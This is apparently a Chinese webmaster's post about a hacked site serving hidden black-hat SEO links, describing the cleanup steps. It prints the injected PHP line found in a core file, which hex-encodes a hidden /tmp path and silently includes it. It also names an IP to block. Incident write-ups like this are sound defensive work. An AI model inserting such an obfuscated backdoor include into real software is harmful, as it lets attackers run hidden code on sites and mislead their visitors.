今天在群里看到看到群友说站被黑了。

查看了一下自己的站，也发现了异常。

几天收入量增加了两万

仔细看收入发现有很多。黑帽链接。

用站长工具查看。发现异常

代码的位置在模板的最上方。

所以排查的方向先从伪静态开始。

然后排查模板顶端。

然后再排查。Php入口文件。

都没有发现问题，那么就可能是在内核文件中

我先清理了备份文件，然后用工具查询了一下。

发现几个异常文件，然后逐一排查。

最后发现是这个文件的问题。

/core/function/handle.php

恶意代码

$runtime_dir = PACK('H*','2F746D702F2E4943452D756E69782F7169716930'); if(is_file($runtime_dir)){ @INCLUDE_ONCE($runtime_dir); }

用十六进制转换一下。

找到文件位置。删除，然后做好防护。

最终问题解决

最后的总结。这种情况在前台几乎无法查看，只有查看看百度的收录异常才能发现。你直接打开网页右键源码时看不到任何问题的。

或者是用站长工具模拟搜索引擎抓取查看，可以看到异常。

1 屏蔽IP18.162.98.238